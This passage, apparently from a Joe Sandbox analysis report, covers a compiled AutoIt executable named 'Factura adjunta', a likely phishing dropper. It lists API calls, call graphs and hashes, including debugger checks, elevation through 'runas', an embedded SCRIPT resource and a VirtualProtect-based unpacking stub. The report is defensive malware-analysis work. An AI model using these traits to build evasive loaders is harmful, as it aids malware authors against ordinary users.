GetStartupInfoW 101031 7dd8b6 101023->101031 101032 7dd9e5 101023->101032 101024->101023 101025 7dd841 __commit @_EH4_CallFilterFunc@8 101024->101025 101025->100970 101026 7ddaad 101113 7ddabd RtlLeaveCriticalSection _doexit 101026->101113 101028 7d8a15 __calloc_crt 58 API calls 101028->101031 101029 7dda32 GetStdHandle 101029->101032 101030 7dda45 GetFileType 101030->101032 101031->101028 101031->101032 101034 7dd904 101031->101034 101032->101026 101032->101029 101032->101030 101112 7da06b InitializeCriticalSectionAndSpinCount 101032->101112 101033 7dd938 GetFileType 101033->101034 101034->101032 101034->101033 101111 7da06b InitializeCriticalSectionAndSpinCount 101034->101111 101038 7d7f43 101037->101038 101039 7e5184 101037->101039 101043 7e4d6b GetModuleFileNameW 101038->101043 101040 7d8a5d __malloc_crt 58 API calls 101039->101040 101041 7e51aa _memmove 101040->101041 101042 7e51c0 FreeEnvironmentStringsW 101041->101042 101042->101038 101044 7e4d9f _wparse_cmdline 101043->101044 101045 7d8a5d __malloc_crt 58 API calls 101044->101045 101046 7e4ddf _wparse_cmdline 101044->101046 101045->101046 101046->100977 101048 7e4fc1 __wsetenvp 101047->101048 101052 7e4fb9 101047->101052 101049 7d8a15 __calloc_crt 58 API calls 101048->101049 101054 7e4fea __wsetenvp 101049->101054 101050 7e5041 101051 7d2f95 _free 58 API calls 101050->101051 101051->101052 101052->100981 101053 7d8a15 __calloc_crt 58 API calls 101053->101054 101054->101050 101054->101052 101054->101053 101055 7e5066 101054->101055 101058 7e507d 101054->101058 101114 7e4857 58 API calls __commit 101054->101114 101056 7d2f95 _free 58 API calls 101055->101056 101056->101052 101115 7d9006 IsProcessorFeaturePresent 101058->101115 101060 7e5089 101060->100981 101063 7d333b __IsNonwritableInCurrentImage 101061->101063 101130 7da711 101063->101130 101064 7d3359 __initterm_e 101065 7d2f80 __cinit 67 API calls 101064->101065 101066 7d3378 _doexit __IsNonwritableInCurrentImage 101064->101066 101065->101066 101066->100985 101068 7b4948 101067->101068 101078 7b49e7 101067->101078 101069 7b4982 74A3C8D0 101068->101069 101133 7d35ac 101069->101133 101073 7b49ae 101145 7b4a5b SystemParametersInfoW SystemParametersInfoW 101073->101145 101075 7b49ba 101146 7b3b4c 101075->101146 101077 7b49c2 SystemParametersInfoW 101077->101078 101078->100989 101079->100962 101080->100967 101081->100974 101085->100990 101086->100993 101087->100999 101088->101001 101089->101005 101090->101006 101092 7d8a1c 101091->101092 101094 7d8a57 101092->101094 101096 7d8a3a 101092->101096 101100 7e5446 101092->101100 101094->101010 101097 7da026 TlsSetValue 101094->101097 101096->101092 101096->101094 101108 7da372 Sleep 101096->101108 101097->101013 101098->101017 101099->101014 101101 7e5451 101100->101101 101106 7e546c 101100->101106 101102 7e545d 101101->101102 101101->101106 101109 7d8d68 58 API calls __getptd_noexit 101102->101109 101104 7e547c RtlAllocateHeap 101105 7e5462 101104->101105 101104->101106 101105->101092 101106->101104 101106->101105 101110 7d35e1 RtlDecodePointer 101106->101110 101108->101096 101109->101105 101110->101106 101111->101034 101112->101032 101113->101025 101114->101054 101116 7d9011 101115->101116 101121 7d8e99 101116->101121 101120 7d902c 101120->101060 101122 7d8eb3 _memset __call_reportfault 101121->101122 101123 7d8ed3 IsDebuggerPresent 101122->101123 101129 7da395 SetUnhandledExceptionFilter UnhandledExceptionFilter 101123->101129 101125 7dc836 __cftoe2_l 6 API calls 101127 7d8fba 101125->101127 101126 7d8f97 __call_reportfault 101126->101125 101128 7da380 GetCurrentProcess TerminateProcess 101127->101128 101128->101120 101129->101126 101131 7da714 RtlEncodePointer 101130->101131 101131->101131 101132 7da72e 101131->101132 101132->101064 101134 7d9e4b __lock 58 API calls 101133->101134 101135 7d35b7 RtlDecodePointer RtlEncodePointer 101134->101135 101198 7d9fb5 RtlLeaveCriticalSection 101135->101198 101137 7b49a7 101138 7d3614 101137->101138 101139 7d361e 101138->101139 101140 7d3638 101138->101140 101139->101140 101199 7d8d68 58 API calls __getptd_noexit 101139->101199 101140->101073 101142 7d3628 101200 7d8ff6 9 API calls __commit 101142->101200 101144 7d3633 101144->101073 101145->101075 101147 7b3b59 __ftell_nolock 101146->101147 101148 7b77c7 59 API calls 101147->101148 101149 7b3b63 GetCurrentDirectoryW 101148->101149 101201 7b3778 101149->101201 101151 7b3b8c IsDebuggerPresent 101152 7b3b9a 101151->101152 101153 7ed4ad MessageBoxA 101151->101153 101155 7ed4c7 101152->101155 101156 7b3bb7 101152->101156 101185 7b3c73 101152->101185 101153->101155 101154 7b3c7a SetCurrentDirectoryW 101159 7b3c87 Mailbox 101154->101159 101400 7b7373 59 API calls Mailbox 101155->101400 101282 7b73e5 101156->101282 101159->101077 101160 7ed4d7 101166 7ed4ed SetCurrentDirectoryW 101160->101166 101166->101159 101185->101154 101198->101137 101199->101142 101200->101144 101202 7b77c7 59 API calls 101201->101202 101203 7b378e 101202->101203 101402 7b3d43 101203->101402 101205 7b37ac 101206 7b4864 61 API calls 101205->101206 101207 7b37c0 101206->101207 101208 7b7f41 59 API calls 101207->101208 101209 7b37cd 101208->101209 101210 7b4f3d 135 API calls 101209->101210 101211 7b37e6 101210->101211 101212 7ed3ae 101211->101212 101213 7b37ee Mailbox 101211->101213 101444 8197e5 101212->101444 101217 7b81a7 59 API calls 101213->101217 101216 7ed3cd 101219 7d2f95 _free 58 API calls 101216->101219 101220 7b3801 101217->101220 101218 7b4faa 84 API calls 101218->101216 101221 7ed3da 101219->101221 101416 7b93ea 101220->101416 101223 7b4faa 84 API calls 101221->101223 101225 7ed3e3 101223->101225 101229 7b3ee2 59 API calls 101225->101229 101226 7b7f41 59 API calls 101227 7b381a 101226->101227 101228 7b8620 69 API calls 101227->101228 101230 7b382c Mailbox 101228->101230 101231 7ed3fe 101229->101231 101232 7b7f41 59 API calls 101230->101232 101233 7b3ee2 59 API calls 101231->101233 101234 7b3852 101232->101234 101235 7ed41a 101233->101235 101236 7b8620 69 API calls 101234->101236 101237 7b4864 61 API calls 101235->101237 101239 7b3861 Mailbox 101236->101239 101238 7ed43f 101237->101238 101240 7b3ee2 59 API calls 101238->101240 101242 7b77c7 59 API calls 101239->101242 101241 7ed44b 101240->101241 101243 7b81a7 59 API calls 101241->101243 101244 7b387f 101242->101244 101245 7ed459 101243->101245 101419 7b3ee2 101244->101419 101247 7b3ee2 59 API calls 101245->101247 101249 7ed468 101247->101249 101255 7b81a7 59 API calls 101249->101255 101251 7b3899 101251->101225 101252 7b38a3 101251->101252 101253 7d313d _W_store_winword 60 API calls 101252->101253 101254 7b38ae 101253->101254 101254->101231 101256 7b38b8 101254->101256 101257 7ed48a 101255->101257 101258 7d313d _W_store_winword 60 API calls 101256->101258 101259 7b3ee2 59 API calls 101257->101259 101260 7b38c3 101258->101260 101261 7ed497 101259->101261 101260->101235 101262 7b38cd 101260->101262 101261->101261 101263 7d313d _W_store_winword 60 API calls 101262->101263 101264 7b38d8 101263->101264 101264->101249 101265 7b3919 101264->101265 101267 7b3ee2 59 API calls 101264->101267 101265->101249 101266 7b3926 101265->101266 101268 7b942e 59 API calls 101266->101268 101269 7b38fc 101267->101269 101270 7b3936 101268->101270 101271 7b81a7 59 API calls 101269->101271 101272 7b91b0 59 API calls 101270->101272 101273 7b390a 101271->101273 101274 7b3944 101272->101274 101275 7b3ee2 59 API calls 101273->101275 101435 7b9040 101274->101435 101275->101265 101277 7b93ea 59 API calls 101279 7b3961 101277->101279 101278 7b9040 60 API calls 101278->101279 101279->101277 101279->101278 101280 7b3ee2 59 API calls 101279->101280 101281 7b39a7 Mailbox 101279->101281 101280->101279 101281->101151 101283 7b73f2 __ftell_nolock 101282->101283 101284 7b740b 101283->101284 101285 7eee4b _memset 101283->101285 101286 7b48ae 60 API calls 101284->101286 101288 7eee67 75D3D0D0 101285->101288 101287 7b7414 101286->101287 101484 7d09d5 101287->101484 101290 7eeeb6 101288->101290 101292 7b7d2c 59 API calls 101290->101292 101294 7eeecb 101292->101294 101294->101294 101400->101160 101403 7b3d50 __ftell_nolock 101402->101403 101404 7b7d2c 59 API calls 101403->101404 101408 7b3eb6 Mailbox 101403->101408 101406 7b3d82 101404->101406 101405 7b7b52 59 API calls 101405->101406 101406->101405 101414 7b3db8 Mailbox 101406->101414 101407 7b3e89 101407->101408 101409 7b7f41 59 API calls 101407->101409 101408->101205 101411 7b3eaa 101409->101411 101410 7b7f41 59 API calls 101410->101414 101412 7b3f84 59 API calls 101411->101412 101412->101408 101413 7b3f84 59 API calls 101413->101414 101414->101407 101414->101408 101414->101410 101414->101413 101415 7b7b52 59 API calls 101414->101415 101415->101414 101417 7d0ff6 Mailbox 59 API calls 101416->101417 101418 7b380d 101417->101418 101418->101226 101420 7b3eec 101419->101420 101421 7b3f05 101419->101421 101423 7b81a7 59 API calls 101420->101423 101422 7b7d2c 59 API calls 101421->101422 101424 7b388b 101422->101424 101423->101424 101425 7d313d 101424->101425 101426 7d31be 101425->101426 101427 7d3149 101425->101427 101481 7d31d0 60 API calls 3 library calls 101426->101481 101434 7d316e 101427->101434 101479 7d8d68 58 API calls __getptd_noexit 101427->101479 101430 7d31cb 101430->101251 101431 7d3155 101480 7d8ff6 9 API calls __commit 101431->101480 101433 7d3160 101433->101251 101434->101251 101436 7ef5a5 101435->101436 101439 7b9057 101435->101439 101436->101439 101483 7b8d3b 59 API calls Mailbox 101436->101483 101438 7b915f 101438->101279 101439->101438 101440 7b9158 101439->101440 101441 7b91a0 101439->101441 101442 7d0ff6 Mailbox 59 API calls 101440->101442 101482 7b9e9c 60 API calls Mailbox 101441->101482 101442->101438 101445 7b5045 85 API calls 101444->101445 101446 819854 101445->101446 101447 8199be 96 API calls 101446->101447 101448 819866 101447->101448 101449 7b506b 74 API calls 101448->101449 101477 7ed3c1 101448->101477 101450 819881 101449->101450 101451 7b506b 74 API calls 101450->101451 101452 819891 101451->101452 101453 7b506b 74 API calls 101452->101453 101454 8198ac 101453->101454 101455 7b506b 74 API calls 101454->101455 101456 8198c7 101455->101456 101457 7b5045 85 API calls 101456->101457 101458 8198de 101457->101458 101459 7d594c std::exception::_Copy_str 58 API calls 101458->101459 101460 8198e5 101459->101460 101461 7d594c std::exception::_Copy_str 58 API calls 101460->101461 101462 8198ef 101461->101462 101463 7b506b 74 API calls 101462->101463 101464 819903 101463->101464 101465 819393 GetSystemTimeAsFileTime 101464->101465 101466 819916 101465->101466 101467 819940 101466->101467 101468 81992b 101466->101468 101470 8199a5 101467->101470 101471 819946 101467->101471 101469 7d2f95 _free 58 API calls 101468->101469 101472 819931 101469->101472 101474 7d2f95 _free 58 API calls 101470->101474 101473 818d90 116 API calls 101471->101473 101475 7d2f95 _free 58 API calls 101472->101475 101476 81999d 101473->101476 101474->101477 101475->101477 101478 7d2f95 _free 58 API calls 101476->101478 101477->101216 101477->101218 101478->101477 101479->101431 101480->101433 101481->101430 101482->101438 101483->101439 101485 7e1b90 __ftell_nolock 101484->101485 101486 7d09e2 GetLongPathNameW 101485->101486 101487 7b7d2c 59 API calls 101486->101487 101488 7b741d 101487->101488 101489 7b716b 101488->101489 101490 7b77c7 59 API calls 101489->101490

                            Executed Functions

                            Function 007B3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007B3B7A
                            • IsDebuggerPresent.KERNEL32 ref: 007B3B8C
                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,008762F8,008762E0,?,?), ref: 007B3BFD
                              • Part of subcall function 007B7D2C: _memmove.LIBCMT ref: 007B7D66
                              • Part of subcall function 007C0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,007B3C26,008762F8,?,?,?), ref: 007C0ACE
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 007B3C81
                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008693F0,00000010), ref: 007ED4BC
                            • SetCurrentDirectoryW.KERNEL32(?,008762F8,?,?,?), ref: 007ED4F4
                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00865D40,008762F8,?,?,?), ref: 007ED57A
                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 007ED581
                              • Part of subcall function 007B3A58: GetSysColorBrush.USER32(0000000F), ref: 007B3A62
                              • Part of subcall function 007B3A58: LoadCursorW.USER32(00000000,00007F00), ref: 007B3A71
                              • Part of subcall function 007B3A58: LoadIconW.USER32(00000063), ref: 007B3A88
                              • Part of subcall function 007B3A58: LoadIconW.USER32(000000A4), ref: 007B3A9A
                              • Part of subcall function 007B3A58: LoadIconW.USER32(000000A2), ref: 007B3AAC
                              • Part of subcall function 007B3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007B3AD2
                              • Part of subcall function 007B3A58: RegisterClassExW.USER32(?), ref: 007B3B28
                              • Part of subcall function 007B39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007B3A15
                              • Part of subcall function 007B39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007B3A36
                              • Part of subcall function 007B39E7: ShowWindow.USER32(00000000,?,?), ref: 007B3A4A
                              • Part of subcall function 007B39E7: ShowWindow.USER32(00000000,?,?), ref: 007B3A53
                              • Part of subcall function 007B43DB: _memset.LIBCMT ref: 007B4401
                              • Part of subcall function 007B43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007B44A6
                            Strings
                            • This is a third-party compiled AutoIt script., xrefs: 007ED4B4
                            • runas, xrefs: 007ED575
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                            • String ID: This is a third-party compiled AutoIt script.$runas
                            • API String ID: 529118366-3287110873
                            • Opcode ID: d63aac19db45b9f69cb8dd76141c96f2613b263358d6c255d28203da92102219
                            • Instruction ID: c4f4ba0b31f6a69017b4241dd4f616089f920e592d7be59bf7d7b0168e5605bf
                            • Opcode Fuzzy Hash: d63aac19db45b9f69cb8dd76141c96f2613b263358d6c255d28203da92102219
                            • Instruction Fuzzy Hash: 4751D730D04288EACF11ABF4DC0DFED7B79FB44300B044165F569A22A7EA7C9A95CB61
                            Function 007B3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 765 7b3633-7b3681 767 7b3683-7b3686 765->767 768 7b36e1-7b36e3 765->768 770 7b3688-7b368f 767->770 771 7b36e7 767->771 768->767 769 7b36e5 768->769 772 7b36ca-7b36d2 NtdllDefWindowProc_W 769->772 775 7b375d-7b3765 PostQuitMessage 770->775 776 7b3695-7b369a 770->776 773 7ed31c-7ed34a call 7c11d0 call 7c11f3 771->773 774 7b36ed-7b36f0 771->774 782 7b36d8-7b36de 772->782 812 7ed34f-7ed356 773->812 777 7b36f2-7b36f3 774->777 778 7b3715-7b373c SetTimer RegisterClipboardFormatW 774->778 783 7b3711-7b3713 775->783 779 7ed38f-7ed3a3 call 812a16 776->779 780 7b36a0-7b36a2 776->780 784 7ed2bf-7ed2c2 777->784 785 7b36f9-7b370c KillTimer call 7b44cb call 7b3114 777->785 778->783 786 7b373e-7b3749 CreatePopupMenu 778->786 779->783 806 7ed3a9 779->806 787 7b36a8-7b36ad 780->787 788 7b3767-7b3776 call 7b4531 780->788 783->782 792 7ed2f8-7ed317 MoveWindow 784->792 793 7ed2c4-7ed2c6 784->793 785->783 786->783 795 7b36b3-7b36b8 787->795 796 7ed374-7ed37b 787->796 788->783 792->783 800 7ed2c8-7ed2cb 793->800 801 7ed2e7-7ed2f3 SetFocus 793->801 804 7b374b-7b375b call 7b45df 795->804 805 7b36be-7b36c4 795->805 796->772 803 7ed381-7ed38a call 80817e 796->803 800->805 808 7ed2d1-7ed2e2 call 7c11d0 800->808 801->783 803->772 804->783 805->772 805->812 806->772 808->783 812->772 813 7ed35c-7ed36f call 7b44cb call 7b43db 812->813 813->772
                            APIs
                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 007B36D2
                            • KillTimer.USER32(?,00000001), ref: 007B36FC
                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007B371F
                            • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007B372A
                            • CreatePopupMenu.USER32 ref: 007B373E
                            • PostQuitMessage.USER32(00000000), ref: 007B375F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                            • String ID: TaskbarCreated
                            • API String ID: 157504867-2362178303
                            • Opcode ID: 0ab1707ed3b9b59ba50a12345c1c3924e307ff62fba5fc9f541d94fc3d76893d
                            • Instruction ID: e8e845b7e7b4f9dbe4eb050066575320dbc3182e4aa9d71f0aa42aa2339a3ba4
                            • Opcode Fuzzy Hash: 0ab1707ed3b9b59ba50a12345c1c3924e307ff62fba5fc9f541d94fc3d76893d
                            • Instruction Fuzzy Hash: C54125B1210A45EBDB245B68DC8DBF93754FB04300F140529FA06D62A7EE6CDEE092A2
                            Function 007B4AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1003 7b4afe-7b4b5e call 7b77c7 GetVersionExW call 7b7d2c 1008 7b4c69-7b4c6b 1003->1008 1009 7b4b64 1003->1009 1010 7edb90-7edb9c 1008->1010 1011 7b4b67-7b4b6c 1009->1011 1012 7edb9d-7edba1 1010->1012 1013 7b4b72 1011->1013 1014 7b4c70-7b4c71 1011->1014 1016 7edba4-7edbb0 1012->1016 1017 7edba3 1012->1017 1015 7b4b73-7b4baa call 7b7e8c call 7b7886 1013->1015 1014->1015 1025 7edc8d-7edc90 1015->1025 1026 7b4bb0-7b4bb1 1015->1026 1016->1012 1019 7edbb2-7edbb7 1016->1019 1017->1016 1019->1011 1021 7edbbd-7edbc4 1019->1021 1021->1010 1023 7edbc6 1021->1023 1027 7edbcb-7edbce 1023->1027 1028 7edca9-7edcad 1025->1028 1029 7edc92 1025->1029 1026->1027 1030 7b4bb7-7b4bc2 1026->1030 1031 7b4bf1-7b4c08 GetCurrentProcess IsWow64Process 1027->1031 1032 7edbd4-7edbf2 1027->1032 1037 7edcaf-7edcb8 1028->1037 1038 7edc98-7edca1 1028->1038 1033 7edc95 1029->1033 1034 7b4bc8-7b4bca 1030->1034 1035 7edc13-7edc19 1030->1035 1039 7b4c0a 1031->1039 1040 7b4c0d-7b4c1e 1031->1040 1032->1031 1036 7edbf8-7edbfe 1032->1036 1033->1038 1041 7edc2e-7edc3a 1034->1041 1042 7b4bd0-7b4bd3 1034->1042 1045 7edc1b-7edc1e 1035->1045 1046 7edc23-7edc29 1035->1046 1043 7edc08-7edc0e 1036->1043 1044 7edc00-7edc03 1036->1044 1037->1033 1047 7edcba-7edcbd 1037->1047 1038->1028 1039->1040 1048 7b4c89-7b4c93 GetSystemInfo 1040->1048 1049 7b4c20-7b4c30 call 7b4c95 1040->1049 1053 7edc3c-7edc3f 1041->1053 1054 7edc44-7edc4a 1041->1054 1050 7b4bd9-7b4be8 1042->1050 1051 7edc5a-7edc5d 1042->1051 1043->1031 1044->1031 1045->1031 1046->1031 1047->1038 1052 7b4c56-7b4c66 1048->1052 1060 7b4c7d-7b4c87 GetSystemInfo 1049->1060 1061 7b4c32-7b4c3f call 7b4c95 1049->1061 1058 7edc4f-7edc55 1050->1058 1059 7b4bee 1050->1059 1051->1031 1057 7edc63-7edc78 1051->1057 1053->1031 1054->1031 1062 7edc7a-7edc7d 1057->1062 1063 7edc82-7edc88 1057->1063 1058->1031 1059->1031 1065 7b4c47-7b4c4b 1060->1065 1068 7b4c41-7b4c45 GetNativeSystemInfo 1061->1068 1069 7b4c76-7b4c7b 1061->1069 1062->1031 1063->1031 1065->1052 1067 7b4c4d-7b4c50 FreeLibrary 1065->1067 1067->1052 1068->1065 1069->1068
                            APIs
                            • GetVersionExW.KERNEL32(?), ref: 007B4B2B
                              • Part of subcall function 007B7D2C: _memmove.LIBCMT ref: 007B7D66
                            • GetCurrentProcess.KERNEL32(?,0083FAEC,00000000,00000000,?), ref: 007B4BF8
                            • IsWow64Process.KERNEL32(00000000), ref: 007B4BFF
                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 007B4C45
                            • FreeLibrary.KERNEL32(00000000), ref: 007B4C50
                            • GetSystemInfo.KERNEL32(00000000), ref: 007B4C81
                            • GetSystemInfo.KERNEL32(00000000), ref: 007B4C8D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                            • String ID:
                            • API String ID: 1986165174-0
                            • Opcode ID: 5e4b9cd406c2f50ca39d10a7e0150f76fc23e6044fc333b5d2bdc9407046e7b7
                            • Instruction ID: c0a99f2b6e41858d0c2503e6a38958a054a2c9731d1ee7458c19bd204827cb04
                            • Opcode Fuzzy Hash: 5e4b9cd406c2f50ca39d10a7e0150f76fc23e6044fc333b5d2bdc9407046e7b7
                            • Instruction Fuzzy Hash: 2D91E47194A7C0DEC731CB7884552EBFFE5AF29300B544D9ED1CB83A42D228E908C769
                            Function 007B4FE9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1130 7b4fe9-7b5001 1132 7b5003-7b501a FindResourceExW 1130->1132 1133 7b5021-7b5026 1130->1133 1134 7edd5c-7edd6b LoadResource 1132->1134 1135 7b5020 1132->1135 1134->1135 1136 7edd71-7edd7f SizeofResource 1134->1136 1135->1133 1136->1135 1137 7edd85-7edd90 LockResource 1136->1137 1137->1135 1138 7edd96-7edd9e 1137->1138 1139 7edda2-7eddb4 1138->1139 1139->1135
                            APIs
                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007B4EEE,?,?,00000000,00000000), ref: 007B5010
                            • LoadResource.KERNEL32(?,00000000,?,?,007B4EEE,?,?,00000000,00000000,?,?,?,?,?,?,007B4F8F), ref: 007EDD60
                            • SizeofResource.KERNEL32(?,00000000,?,?,007B4EEE,?,?,00000000,00000000,?,?,?,?,?,?,007B4F8F), ref: 007EDD75
                            • LockResource.KERNEL32(N{,?,?,007B4EEE,?,?,00000000,00000000,?,?,?,?,?,?,007B4F8F,00000000), ref: 007EDD88
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Resource$FindLoadLockSizeof
                            • String ID: SCRIPT$N{
                            • API String ID: 3473537107-636813992
                            • Opcode ID: 1c52542ae59eddbe357428c97e1ae565a55bb8e5eb71bfddd4fe8fe975221a4b
                            • Instruction ID: cb5c2c3e436e66e231d6b5ff832dc7695f18b7412cd8296cc1d34198d8893e09
                            • Opcode Fuzzy Hash: 1c52542ae59eddbe357428c97e1ae565a55bb8e5eb71bfddd4fe8fe975221a4b
                            • Instruction Fuzzy Hash: 80115A75600700AFDB219B65DC58F677BB9FBC9B11F204569F506C6260DB72EC0086A0
                            Function 008D7080 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(?), ref: 008D71BA
                            • GetProcAddress.KERNEL32(?,008D0FF9), ref: 008D71D8
                            • ExitProcess.KERNEL32(?,008D0FF9), ref: 008D71E9
                            • VirtualProtect.KERNELBASE(007B0000,00001000,00000004,?,00000000), ref: 008D7237
                            • VirtualProtect.KERNELBASE(007B0000,00001000), ref: 008D724C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                            • String ID:
                            • API String ID: 1996367037-0
                            • Opcode ID: e3555d4b9287063b8d6390e167e9a85493cc4721d9a287928e979e05a15a4b1c
                            • Instruction ID: 6836546a863ef3c6959aa20186aa6e1ff65742cc14a8266e0d971e769613516f
                            • Opcode Fuzzy Hash: e3555d4b9287063b8d6390e167e9a85493cc4721d9a287928e979e05a15a4b1c
                            • Instruction Fuzzy Hash: F0512872A5CB564BDB219EB8CCC0660B7A5FB51324B28077ADAE6C73C5F7A05C068760
                            Function 00814696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNELBASE(?,007EE7C1), ref: 008146A6
                            • FindFirstFileW.KERNELBASE(?,?), ref: 008146B7
                            • FindClose.KERNEL32(00000000), ref: 008146C7
                            Memory Dump Source
